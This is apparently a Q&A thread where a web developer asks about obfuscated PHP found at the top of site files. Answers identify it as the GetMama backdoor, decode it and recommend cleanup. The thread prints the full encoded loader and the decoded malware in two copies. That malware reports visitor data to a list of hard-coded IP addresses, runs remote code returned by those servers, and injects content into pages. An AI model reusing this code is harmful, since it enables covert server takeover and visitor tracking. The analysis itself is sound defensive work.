# Found this very strange PHP code in one of my class files. What is it?

Tags: php

I built a website for a client a while ago who has been having issues with it.  After getting into the site files I found this at the top of one of the PHP classes:

```
<?php
/*ad0b18735e68b25aa9c4374221824db5_on*/ $byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb= array('8759','8776','8755','8766');$ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P= array('8569','8584','8571','8567','8586','8571','8565','8572','8587','8580','8569','8586','8575','8581','8580');$J0BQOOWj4oRnP7liN= array('7450','7449','7467','7453','7406','7404','7447','7452','7453','7451','7463','7452','7453');$UbjPmIKWlC="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa2RXU0dKSWNHdFRSVEYyVTFkMGEySkhVa1pOVjJocFZqQldjRk14VG5OT01HeEVVVzB4YTFaNlZuRmFSV1J6WkcxS2NGRnVVbWxOYkVwdFYxUkpOV1JWZEVSVmJXeHJWakZzZDFwVVRrOU5SMDV6VDFoQ2FtSldXak5aYTJSSFlXeHdWRm95YkZGU01IQXlWMnRvY2tzd2JIQmtNbXhSVWpCd01sZHJhSEpMTUd4d1pESjBXbUpzV25SVVJVNVRZVzFLZFZWdFdtaFJNbk16V1Zaa1dsb3dkRVJWYlhCcFlteEtiVmxWVGtKUFZrSlVVVmhvVEZVd1NUTlRhMlJMVFZad2NGRlViRXBUUlRSM1dUSjNOV05IVG5SV2JtUnBVakJhY1Zkc1RtNWhWa0pJVTI1YVlWTkhjM0pUVjJ3ellWWkNTRk51V21GVFIzTnlVMWRzUW1SVmJFbFVha0pxWWxkNE0xbDZTalJoUjAxNVlVZDRhbVZYWkhKWFJFWlBVbXhXYzFkcldsWmlTRTV3VjJwSk5XUnNjRVJUYlZKTVZUTmtjbGRYTlZkaVZYUlZZekprYW1KV1dYZGFSbWhMWkZWc1JGVnRiR3RXTVdzeldteG9UMDFIVG5OUFdFSnFZbFphTTFsclpFZGhiSEJVV2pKc1VWRjZiSEJaYWtwVFRsWkNjRk5ZVGtwaGJtUXlWMWN3TldFeVZsVk9SMnhOVVRGS2NGcEdaRnBqTUhCSVZHNVdhMUpxYkhaVE1WSXdZMFp3Y0ZGWE9VdFNNRFV4V2tWWk5XSXdiRVZOUkd4S1VrVldkMU5WYUhwaE1XeDFWbTB4U2xKRVFtNVplazVUWlZabmVXSkliR0ZYUlVwNlYxWmtUMkpGZEVSVFZHaE5UV3R3TWxkcmFISkxNR3h3WlVod2ExTkZjSGRaTUdoUFl6RnNXVlJ0T1dGWFJURjJVMnRaTlZaR1NsZFRiR1JUVm10d2FWTlhNV3RrYlVsNVZWZHNXVlV5ZERGVFYzQXpaR3hzZEU5WGRHeFdSRkp3VkVWT1UyRlhVbGhYV0VKUVpWVktOVmRzYUZOTlYwNTBUa2RrUzFJd2IzaFhiWEF3VDFkT2RGWnFRbXRYUlhBeFUxVk9VMkZYVWxoWFZHUnRWakZ2ZUZsdE1VOU5SMFpZVDFoV1NsSjZiRE5YVm1NeFkyMUdWRm95ZEZwaWJGcDBVekZvZW1FeGIzcGpSMXBoVlRCRk5WTlZaR0ZoUjBwSlZHMTRVR1ZXU25aWFJFb3pXakZDVkZGdE9XRldNRnB5VjJ4b1MyVnNaM2xsU0VKcVRURkdkbE14VWpCalJuQndVVmM1YUZaNlZtMVhWbWhMWlZac1dXRXlPVXBoTURVeVdXMDFVMkpIU25WVldGSlRWbnBXY1ZscVNsTmpSMHAwV1hwYVNsSXlVVEpaVm1oQ1lWVjRSRkZYZEdoU2FteDZVekZPY2xveVZqVlJWM1JoVFROQ2JWZHNUa0pQVld4SlZXNXNhMVl4VlROYWJHUnpZbFZzUkZveWRHRk5NMEp0VjJ4T2MwNHdjRWxWYmxKcVVqRndNVmRXWTNoaVJXeEZUVWRrYTFJeFdqQlpNR014WVVkS1ZGb3liRTFOTVVvd1dUQk9TbU13YkVSVGEyUlZUVVJvY0ZNeFVqQmlWMFpZWlVkNFdVMHdTWGhhUlZrMVlXMUplVTVVUW1GV2VsVjNXVE5zYm1FeVVraE5XR1JoWWxSV2IxbHNaRlpqTUd4RVZXMXNhMVl4YkhkVU0yeFRUbXh3UkZGVWJFcFNNbEV5V1dwT1EySkhTbkJhTW5SclVucEdNMWR0TURGaFIwcFlWbGhPU2xFd2NEVlRWMnh5VGpCd1NGUnVXbWxpYkVweldXMDFVMlZyYkVWTlIyUmhUVE5DTlZkc1pFZGhNSFJFVldwYVlWRXpaRzVVVmxKQ1pEQXhSVkZZWkU1U1JVWjNWRE5zVTJGdFNYbE9WRUpoVm5wVmQxa3piRUpQVld4SVRWaGFZVkpxYkhGWmFra3dZakJ3U0ZSdVdtbGliRXB6V1cwMVUyVnJkRlZrUnpWc1lsVTFlbGxxVGs5aVJYUkVWV3BhWVZFeWN6TmFSbU14WXpKR1dFNVlTa3hSTVVsM1dXeG9RMkpYU25SU2JsSmhWVEp6TTFOclpFOWtiVXAxVlcxNGFXSnNTalpUVlZGM1dqRnZlbU5IZUdsaVZUVXlWMnRrVm1Jd2NFaFVibHBwWW14S2MxbHROVk5sYTNSVlpFUnNTbEl4V25wWmVrcFdXakpXTlZWdGNHbE5hbFYzVjJ4ak1VMUhUalZSVkd4S1VucEdNbGRyV1RWaGJVbDVUa2M1UzFJd2IzaFhiV3h5VGpKYVZGVnVUbUZXZWxKdVZVWk9RMlZ0VWtsVGJrNWhWbnBTZGxOclpFOWtiVXAxVlcxNGFXSnNTalpUTVZJd1lqRndXRkp0ZEdGWFJXeDJVMWQwVDJSdFNuVlZiWGhwWW14R01GWkZaRmRrVm05NlZXMDVVR0ZWUm5CVVIyeFRZekZ3V0U1SVFsQk5NSEJ6V2tWb1YyVlhTbkJhTW5SYVRXcHNNVnBGWkZka1YxSkpWRmhDVUUxNlFtNVhiVFZYWkZacmVsVnVRbWxOYWxKdVZXcEtWMDFHVWxoU2JsSmFWVEprZDFwWWJGTmtSMGw2VlcwNVlWZEZiRzVWUms1Q1lWZEtXRlZ1YkdsV01WcHlXVlprUjJKdFRuUlBWRVpxVVhwV2NWbHFTWGRoVlRoNlUyMTRhMU5HV2pWWmJXeENZVEpLV0U5VVFtaFNNVm8xVkhwTmVHUnNiSE5QV0hCclVqQmFOVnBGVG01aFYwbDZVVzFvYVdKWVVuZFRWMnh5VGpGd2RWWnVWbHBOTVVwM1dXcEpNRm94YkZoaFJ6RnJWakZLZEZsclpHRk9iSEJJWVVjeGFGTkZNWFpUYTJoRFlVVjBXV015ZEdsV01Gb3dWMVpPUWs5VmJFWmFSM2hyVWxSR2IxbHNaRVppTUhSVll6SjBZV0pYZUhwWGJFNUNUMVZzU1ZadWJHbFNNVm94VjFSSk5XRXhjRlJoUjFwWlRVWndTMVpGVmxkYWJHZzFZWHBrYUZZeGJHNVRNR1J6WlcxTmVWWnFRa3hSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3U2xacldsTlZWbWQzWVVaQ1ZrMVdSbkJYUms1eVkwZFdOVlZ0T1dsTk1EUjNVMVZSZDFvd2NFZFBWbEpUVm10d1dGVnNXa3RaYTJ4eVlVWldWMUpyU20xVk1GVTFWa1phUkZOdFVsQk5la0p1VjJ4a05HVnNjRlJSYW1STFVqSm9NbGw2VGxKYU1VSlVVVmRzU21GdVVUVlpWbVJhV2pCMFNHSkljR3BOYkZsM1V6Qk9VMXBzVlhkV2JFNVhZVEZhVkZZemJFdFZNVXBXVFZaQ1YxSldXbTFWVmxaVFVsWldjRk50VWt4Vk1uY3pVMnRrYzJRd2JFVk5SMlJMVW1wc1ZWVnNXa3RXTVVwWFUyMUtTbUpGY0VkV1JsVTFWbFpLVjA5VlNsTlNWa3BVVTFkM2QwNHlXbFJSYlhocFUwVTFjMU5WYUhwaE1rWlpVVmRrVVZVd1JuQlRWM0F3VDFkR1dGZFhaRXhTTW5nMldYcEtWMDFGZEVSVmJWcFdUVVphVkZadGRGZFZNV1ExVTJ0c1YxSnNTbEpYUkVaTFVteEtjbFpzVGxOV2EyeHdWMFpPY21OSFZqVlZibXhoVmpGc2JsVkdUa05OVjA1MFpVZDRhV0pWTlRKWGEyUldZakJ3UjA5V1VsTldhM0JZVld4YVMxbHJiSEpoUmxaWFVtdEtiVlpYZEZkU01VcFhVMnRhVm1GVmNHdFRNVkl3VDFWc1NGWnVUbXBOYkZadVdsaHNVMlZXY0ZoWFYyUlJWVEJHY0ZOWGNEQlBWMFpZVjFka1RGSXllRFpaZWtwWFRVVjBSRlZ0V2xaTlJscFVWbTEwVjFVeFpEVlRhMnhYVW14S1VsZEVSbGRXUmtwWFUyMWFVbFpYVWtkV1IzaFNZVlpvVkdFelFteGxWa2w0VjFaT1FrOVZiRWxXYm14cFVqRmFNVmRVU1RWaE1YQlVZVWh3YTFORmIzZFpha28wWkcxUmVWWnViRXhSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3U2xacldsTlZWbWQ0Vm14U1UxWnJjRzFWVmxaclVteFNjMVZYYkZsVk1uUjNWSHBOZDFveGNGaGxTSEJoVlRCSk0xTnJhRmRoUld4RlRVZGtTbUZWYXpOYWJHUnpZbFZzUkdGSVFtcE5NRFZ6V2tWT2JtRXhaM2hVYTFwV1lrWndSMVpYZUhwaFZsWlhWbXRhVm1KSGVHMVdWRVpUVlRGT1ZrNVZhRXBpUkVKM1V6Rm9lbUV5VGxsVVYyUlJWVEJKZUZreU1UUmlSMHAwVkc1YVlWSXhWblpUYTFrMVZrWktWMU5zWkZOV2EzQnBVMWQ0UjFac1NsZFRiSEJaVFZVMVZsWlhkSE5VTVVvMVUyMVNURlpJVVRWVFZXUlhZekpOZVZaWFpHeGxWa28wV1ROc1FrOVZiRVJUVjJ4UVRYcENjbHBHYUV0ak1XZzJVVmRrVVZVd1JuQlpWV2hUVFVkT1JXSXpXazFsVld4dVZFZHNRbUV5VGtoU1ZHUkxVMFphTlZscldUUmxSV3hGVFVka1NtRlViSGhYYkdSVFkwVjRkVkZ0T1dwU1JHdDVWMnhvUzJWdFJsaFBXRlpSVmtWRk1WUXhVazVpVjBwWVQxUkNhRkl4V2pWVlJrNUtXakI0Y0ZWdVVscFdla1p2VTFWTk1Gb3diSEJYYlRGb1ZqTm9jMVZHVGtwYU1IaHdVVmQwWVdKWGVIcFhiRTVDWkZWc1JGTlhNV2hTZW13MldrVlJkMkZWYkVST1IyUkxVakpvTWxsNlRsSmFNSGh3VVZkc1MySlhlRE5WUms1S1dqQjRjRkZYZEdoWFJVWnVWRWRzUW1GVmNIVlRiWGhoWVdwQ2NGTlZUVEJhTUhCSlUyMTRZV0ZWUmpGVFZVNUtZbGRTV0ZKVWJFcGhWVVl4VTJ0b1YyRkZiRVJPUjJSS1lWWndORmt6YjNkaFZXeEVUa2RrUzFORldqWlVNMnhUVFVkT2RXRXlaRkZWTUVsM1dUSTFWMkpGT0hsaVJ6Rk1VVEJLZEZwR1l6RmhiVkpJWWtoYWFXSkViSE5hVldSelpXMVNTVlJYT1VwaVZUUjRXVEl4TkZwdFJsaE9XRUpyVVRCc2QxTlZUbk5PTUhCSVZHMDVTbEpFUW01WFZFNVhaVmRLUjA5WVFtbGlWM2QzVXpCT1UwMVhUblJsUjFwT1VUQkdNVk5WVGxOTlYwNTBaVWRhVGxVeWN6TlhWRTVYWlZkS1IwOVljR0ZYUmtveVdUQm9VbUl3Y0VoVWJUbE5VVEJLUlZac1drdFVWbEY0VVd4V1dVMVZjRWRXYTFwWFZURlNjMVZzVGxKV1ZGWlZWVzEwVjFVd2VFUlJXR2hNVmtoU2NWcEdhRXRqTVdkNlZHMTRhMUo2YkROYVJVNXVZVEZyZVZvelRrcFNWVFZYVmxkME5GVkdWa2RWYlZwWFVsZDRUMVZzVlRWV2JGcEVaREprVG1WWGN6TlRhMmhYWXpKU1JGRlViRXBUUmtvMVdWWmpkMkl4YTNwV2JteHBVbXBzYzFwVlpGZGhhM1JFVlcxd2FGRXlkSGRVTTJ4VFRVZE9kV0V5WkZGVk1FcDBWMVprTkdWc2NGVmtSR3hLVWpKNGRGTlZUbTVpTWtaWVRsaENXVTF0VW5OYVJVNXVZVlpzV0dWSVRtbE5NbEp0V2tab1MyTXhaM2xYYmxwcVVqRmFNVk5YYkhKalJXeEVWMWN4U2xFeFNYZFpNalZ5WTBWc1NXTXlkR3RXTTJkM1UxVlJkMW95VWtsVGJrSnBWVEpvUWxkdE1YTmpNWEJYVDFjMVlWZEdTbTFYVkVrMVpGZFNTRlp1Vm10VFJURjJVMnRvVjJWWFNrZFBTR1JLVVhwU2JsTnJhRmRsVjBwSFQwaG9URlV5Y3pOVGEyaFRaVmRXVkZGVWJFcFNNWEJ2V1d0b1QySkZPSHBOV0VKaFlWZGtjbHBGYUV0T1ZYUlpZekowWVdKclJtNVZSazVEWWxkTmVVOVhjR2hOYW13elYyeGpNR0l3Y0VsUmJXaE5VVEJGTUZSVlRqTmFNSEJJVm01c2FtSlVWakpVUlU1Q1lURndXVk51YkdwTk1VbzFWRVZPUW1Wck1VUmhlbVJvVmpGc2JsTXdUbE5pVjA1RVlUSmtiR1ZXU2pKYVJtaFNXakZDVkZGWGJGTk5SbHBXVTFWT1UwMVhUblJsUjFwT1ZUQktTbFpyV2xOVlZYZzJVbGhXVGxKdWFEVlhSV013WVZVNU5WVnVXbXRYUmtadVZFZHZkMW93YkhKaFNGcHFUVEZGTWxOVlRsTmtNV3hYWlVoc1dWSjZVbkJVTTJ4VFpHMVNXVlZYWkUxaGFrSnVVMWQwVDJSdFNuUk9WM2hhVFRGS2QxbHFTVEJPYTJ4R1ZHNU9hVTB3TlhOWFJXaExXVEpLYzJWSWJGbFNlbEp3VkhwS1lVMHlUblJpUkVKaFZUSmtjbGR0TlVKak1HeEVWVzVhYTFkR1JuZFVNMnhUWlZad1dWVlhaRkZWTUVad1UxZHdNRTB5UmtoaVNFNWhWVEJHZGxOV1pHRmlSMGw1VjFjNVMxSXhjRE5UTVU1eVdqSldOVlZ1YkdGWFJrWnVVMVZOTUU5VmJFUlJiVEZoVFd4WmQxa3piRzVoTVhCMVVWaE9TbEpGVmpWVU1FNXlUakphV0ZkdGNHbFNlbXcyVjJ4T2JtRXhjSFZSV0VKUVpWWkplRmxyYUZKYU1VSlVVV3BDYW1KWGVEQlRNR2hQVFZac2RWUnFRbXBoVjJSeVdUSXhWMDFGZUVSUmJuQnJVMFZ3TTFscVRrNWlNSEJKVTIxNGExRXpaRzVUVjNnMFpWWm9TRTVYVG1waVNHZ3hVMWRzY2xvd2REVlJWRUpNVlRKek0xcHNaM2RhTUd4SVlrY3hTbEV5YURaYVJXaExaREpKZWxSWE9VdFRSbHA2V2tWT00yRldjRmxYYldocFVUQnNkMU5WVGtaUFZrSlVVVzB4V2xZemFEWlhiRTV6VGpCd1NXSXlaRkZWTUVvMldrVm9TMk5IVGtsVWJrNWFWMFUxZGxkc2FFNWlNazE2Vlc1c1dVMHdjSE5aTUdRMFlVWnJlVlpYT1VwaVZsbDVWMVprTTJGVmVFUlRWMnhOVVRGSmVGbHJhRkpqUlhSVll6SmtZVmRHY0c5WmEwNXVZVEpXY0dGNlpFcFNNVmt3V1Zab1VtSXdkRlZrUkd4b1ZqRnNibE13YUU5TlIwNTFVVzVhYW1WWFpISmFSbVEwVFVWNFJGTnRlRnBpVkZadlUxZHNjbG93YkZWTlJHeEtVakZ3YjFscmFFOWlSWFJaWXpKMFdVMVZOVWRXVjNoaFVteFdjMk15YkdGTmFtd3lWMnRPUzFwRmJFVk5SMlJxVFRGS05WZEVUa3RpUjA1SVpVZG9XazFzVm5aVFZ6RlhZVmRLZEZKWGJFMVJNR3h3VkVWT1UwMVhTa2xWV0VKUVRUQndjMXBGYUZkbFYwcHdVV3BDYW1Kc1duTlVlazE0WWtkS1NWUnRlRXBUU0ZJMVYyeG9VMDFYVG5ST1IyUmhZbFZhZWxsNlNsWk9NbHBaVFVkMFlXSlZXWGRaVldSWFpWVXhjMlJIVWtwU1JFSnVVMWR3YWswd2VIRmFNMmhOWVd0cmQxUldUVEJsVlRWVlZGZHNVR1ZXU25SWFZtaFRZakZ3V1ZOWWJGaE5WRUp1VlVaT1FtRlZOVVZYV0ZaT1lXeEZNVlJIY0ZaT1JYaHhVbGh3VDFVd2F6TlRhMlJoWVVkU1NHRkhlR3BoYTNCcFYwWk9RazlWYkVSVFdHaFBaV3hzTVZReFRUQmxWVFZGVWxoV1RsWkdWak5UVjNCNllURndkRkpxUW1oU01WbzFWRmQ0TUZwRmJFVk5SMlJLWVd4RmVWUkhjRTVOTUhoeFVsUktVRlY2VVhoVWJXeEtUakJ3U0ZkdGFHdFNNbWh6V1RKd1MxbHNhRlJSVkd4S1VUQnJNVlJyVFRCbFZUVkZVMWhXVG1Gc1ZYaFVSM0JPVFZWc2NXTXlkR0ZpVlZsM1dWVmtWMlZWTVhOa1IxSktVa1JDYmxOWGNFWk5NRGxFVGtob1QyRnJiREZVVmxKS1RsVjRjVk5ZYkU1bFZXc3pVMnRrWVdGSFVraGhSM2hxWVd0d2FWZEdUa0pQVld4RVUxaHdUbFY2VWpSVU1GSlNaRlV4Y1ZSVVFrMWhiWE41VTFkd2VtRXhjSFJTYWtKb1VqRmFOVlJYZURCYVJXeEZUVWRrU21GdFRYcFVSM0J5VFZWNGNWSlVVazFoYTFVd1ZERk9TazR3Y0VoWGJXaHJVakpvYzFreWNFdFpiR2hVVVZSc1NsRXdhekZVV0dzd1pVVTFObEZZVms1V1JUQjZWRWR3U21WVmJIRmpNblJoWWxWWmQxbFZaRmRsVlRGelpFZFNTbEpFUW01VFYzQkdUa1U1UkU1RVFrNVJlbEV4Vkd4Tk1HVlZOVVZWVjJ4UVpWWktkRmRXYUZOaU1YQlpVMWhzV0UxVVFtNVZSazVDWVZVeFZXRjZWazFoYTFZMFZHeE5NR1ZWTVRaU1dGWlBWa2RrY0ZRemJGTmlWbXhaVlcwNVlWZEZiRFZXZWtWM1dqRkNWRkZYYkZCU1JXd3hWRlpTY21WVmVIRmFlazVOWVd0VmVsUXdUa3BPTUhCSVYyMW9hMUl5YUhOWk1uQkxXV3hvVkZGVWJFcFJNR3cxVkZaU1dtUlZNWEZWVkVwTllXMXpNVlJIY0VwbFJUVlVVMVJrUzFJeGNHOWFSV1J2WWtkT2NWTnRTbGxWTUVVMVUxVk9TazVWTlZST1NHeE9Wa1ZXTVZSV1VtNWtWVFUyWVRKc1VFMHdOWFphUm1SaFlsZEtTRlpYT1V0U01YQnZXa1ZrYjJKSFRuRlRXRUpRVFd4d01sa3lNVmRoUm10NVdqSTVTMUl4Y0c5YVJXUnZZa2RPY1ZOWFpGcFhSVEZ1VTJ0b1YyVlZkRmxrU0VKaFlWVkdkbE5WWkVkaU1YQjFWbTEwWVdKWWFIUmFWekZUWWpGd2RHRkljRXhSTVVsNFdUSnNjbG93ZEZSUmFtUktVakJ3TlZkc1pFZGphMnhGWkVSc2JWZEVRVGxKYVd0d1QzbEJQU0lwS1RzZyIpKTsg";if (!function_exists("Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ")){ function Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($fmG17jH6h8R6pfvV6ODRd6K,$iot3u6fS){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 = '';foreach($fmG17jH6h8R6pfvV6ODRd6K as $seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 .= chr($seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh - $iot3u6fS);}return $AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7;}$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6 = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb,8658);$UsopvTU00NLoC = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P,8470);$D4fUhPPUiQCBxt = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($J0BQOOWj4oRnP7liN,7352);$UCUMQ98AUYryzF0tSVyD = $UsopvTU00NLoC('$kiNmYfN',$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6.'('.$D4fUhPPUiQCBxt.'($kiNmYfN));');$UCUMQ98AUYryzF0tSVyD($UbjPmIKWlC);} /*ad0b18735e68b25aa9c4374221824db5_off*/ ?>
```

I have no idea what it is and it's impossible to decipher.  Nothing is output when you access the file directly online.  Any ideas?  Does it seem malicious?

Comment: If it's written like that, it definitely can't be good.

Comment: Is this a Worpress site?

Comment: I'm pretty sure that that's encrypted code. Are you the only person who has worked on the site? If so, then you may have been hacked. If not, ask the other developer(s) if they put it there.

Comment: @Paul Wordpress is open source... I don't the code would be encrypted like that...

Comment: @MihirSingh I understand, that's not why I'm asking. Wordpress is prone to this type of thing. I was asking to get more background info on the site

Comment: Please explain what "having issues" means? What exactly has your client been having issues with?

Comment: @Paul Sorry... I suppose a third party plugin could be encrypted like this... That's (the above) a good question... Issues with a certain part of the site could help you figure out the hacker's intent..

Answer (score 5, accepted):

If you and none of your developers have any idea where it came from then I guess you are under an attack :(. The immediate fix is to do the following,

1. Clean all your files.
2. Switch to secure FTP access immediately
3. Do some more research on internet about this attack and see what other actions you need to take.

You need to do it quickly since browsers like chrome and FF will notice it soon and would start showing your site as malicious to users.

Comment: I'd also add: if your server has been compromised, the only way to be sure you've cleaned it out is to re-install from scratch. If the attacker has installed a rootkit you're not going to get rid of him with SFTP. Also, beware of backups - your attacker might have been in for a while, in which case some of your backups might contain his code.

Comment: Thank you, I supposed I could've figured this out with a little more searching.  The site itself isn't WordPress but there are other WP sites on this client's shared hosting account. Literally EVERY php file on his hosting account has some version of this exploit at the top. What a pain!!!

Answer (score 5):

You most certainly got hacked.

I did the fun to poke into the code.

The code is base64_encoded multiple times and then eval'd. Result is:

```
if (!function_exists("GetMama")){  
function mod_con($buf){

str_ireplace("<body>","<body>",$buf,$cnt_h);

if ($cnt_h == 1) {

$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
 return $buf;}

str_ireplace("</body>","</body>",$buf,$cnt_h);

if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); 

return $buf;}
return $buf;}

function opanki($buf){
$gz_e = false;$h_l = headers_list();

if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}

if ($gz_e){

$tmpfname = tempnam("/tmp", "FOO");

file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");

$contents = gzread($zd, 10000000);

$contents = mod_con($contents);

gzclose($zd);

unlink($tmpfname);

$contents = gzencode($contents);} 

else {

$contents = mod_con($buf);}

$len = strlen($contents);

header("Content-Length: ".$len);

return($contents);} 

function GetMama(){
$mother = "mdrmediagroup.com";

return $mother;}

ob_start("opanki");

function ahfudflfzdhfhs($pa){

$mama = GetMama();

$file = urlencode(__FILE__);

if (isset($_SERVER["HTTP_HOST"])){

$host = $_SERVER["HTTP_HOST"];} else {

$host = "";}

if (isset($_SERVER["REMOTE_ADDR"])){

$ip = $_SERVER["REMOTE_ADDR"];} else {

$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){

$ref = urlencode($_SERVER["HTTP_REFERER"]);}

 else {

$ref = "";}

if (isset($_SERVER["HTTP_USER_AGENT"])){

$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));}

 else {

$ua = "";}

if (isset($_SERVER["QUERY_STRING"])){

$qs = urlencode($_SERVER["QUERY_STRING"]);}

 else {$qs = "";}

$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;

$try = true;

if( function_exists("curl_init") ){

$ch = curl_init($url_0 . $url_1);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_TIMEOUT, 3);

$ult = trim(curl_exec($ch));

$try = false;}

 if ((ini_get("allow_url_fopen")) && $try) {

$ult = trim(@file_get_contents($url_0 . $url_1));

$try = false;}

if($try){

$fp = fsockopen($pa, 80, $errno, $errstr, 30);

if ($fp) {

$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);

$ret = "";

while (!feof($fp)) {

$ret  .=  fgets($fp, 128);}

fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));

}}  

if (strpos($ult,"eval") !== false){

$z = stripslashes(str_replace("eval","",$ult));

 eval($z);

 exit();}

if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);

return true;}

else {
return false;}}

$father2[] = "77.81.241.253";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "31.184.234.96";$father2[] = "77.95.18.189";$father2[] = "93.170.137.22";$father2[] = "188.40.95.244";$father2[] = "199.115.231.58";$father2[] = "82.192.87.178";$father2[] = "216.246.99.215";$father2[] = "95.211.18.79";shuffle($father2);foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}}}
```

Comment: Nice! Here's a little more info on the malware... http://sucuri.net/new-malware-eval-getmama-encoded-javascript.html

Comment: Next time you plan on posting code, try to format it properly. It was hell editing that.

Answer (score 2):

Yes it is malicious code, its a bunch of base64 encoded stings evaled, and the resulting code is:

```
    <?php 
if (!function_exists("GetMama")){
    function mod_con($buf){
        str_ireplace("<body>","<body>",$buf,$cnt_h);
        if ($cnt_h == 1) {
            $buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
            return $buf;
        }
        str_ireplace("</body>","</body>",$buf,$cnt_h);
        if ($cnt_h == 1) {
            $buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
            return $buf;}return $buf;}function opanki($buf){
                $gz_e = false;
                $h_l = headers_list();
                if (in_array("Content-Encoding: gzip", $h_l)) {
                    $gz_e = true;
                }if ($gz_e){
                    $tmpfname = tempnam("/tmp", "FOO");
                    file_put_contents($tmpfname, $buf);
                    $zd = gzopen($tmpfname, "r");
                    $contents = gzread($zd, 10000000);
                    $contents = mod_con($contents);
                    gzclose($zd);unlink($tmpfname);
                    $contents = gzencode($contents);
                } else {$contents = mod_con($buf);}
                $len = strlen($contents);
                header("Content-Length: ".$len);
                return($contents);}
                function GetMama(){
                    $mother = "mdrmediagroup.com";
                    return $mother;}ob_start("opanki");
                    function ahfudflfzdhfhs($pa){
                        $mama = GetMama();
                        $file = urlencode(__FILE__);
                        if (isset($_SERVER["HTTP_HOST"])){
                            $host = $_SERVER["HTTP_HOST"];
                        } else {
                            $host = "";
                        }if (isset($_SERVER["REMOTE_ADDR"])){
                            $ip = $_SERVER["REMOTE_ADDR"];
                        } else {$ip = "";
                        }if (isset($_SERVER["HTTP_REFERER"])){
                            $ref = urlencode($_SERVER["HTTP_REFERER"]);
                        } else {$ref = "";}
                        if (isset($_SERVER["HTTP_USER_AGENT"])){
                            $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {
                                $ua = "";
                            }if (
                            isset($_SERVER["QUERY_STRING"])){
                                $qs = urlencode($_SERVER["QUERY_STRING"]);
                            } else {$qs = "";}
                            $url_0 = "http://" . $pa;
                            $url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
                            $try = true;
                            if( function_exists("curl_init") ){
                                $ch = curl_init($url_0 . $url_1);
                                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                curl_setopt($ch, CURLOPT_TIMEOUT, 3);
                                $ult = trim(curl_exec($ch));
                                $try = false;
                            } if ((ini_get("allow_url_fopen")) && $try) {
                                $ult = trim(@file_get_contents($url_0 . $url_1));
                                $try = false;
                            }if($try){
                                $fp = fsockopen($pa, 80, $errno, $errstr, 30);
                                if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";
                                $out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";
                                fwrite($fp, $out);$ret = "";
                                while (!feof($fp)) {
                                    $ret  .=  fgets($fp, 128);
                                }fclose($fp);
                                $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
                                }
                            }
                            if (strpos($ult,"eval") !== false){
                                $z = stripslashes(str_replace("eval","",$ult));
                                eval($z);
                                exit();
                            }if (strpos($ult,"ebna") !== false){
                                $_SERVER["good"] = str_replace("ebna","",$ult);return true;
                            }else {return false;}}
                            $father2[] = "77.81.241.253";
                            $father2[] = "46.249.58.135";
                            $father2[] = "176.9.241.150";
                            $father2[] = "46.37.169.56";
                            $father2[] = "94.242.255.35";
                            $father2[] = "178.162.129.223";
                            $father2[] = "31.184.234.96";
                            $father2[] = "77.95.18.189";
                            $father2[] = "93.170.137.22";
                            $father2[] = "188.40.95.244";
                            $father2[] = "199.115.231.58";
                            $father2[] = "82.192.87.178";
                            $father2[] = "216.246.99.215";
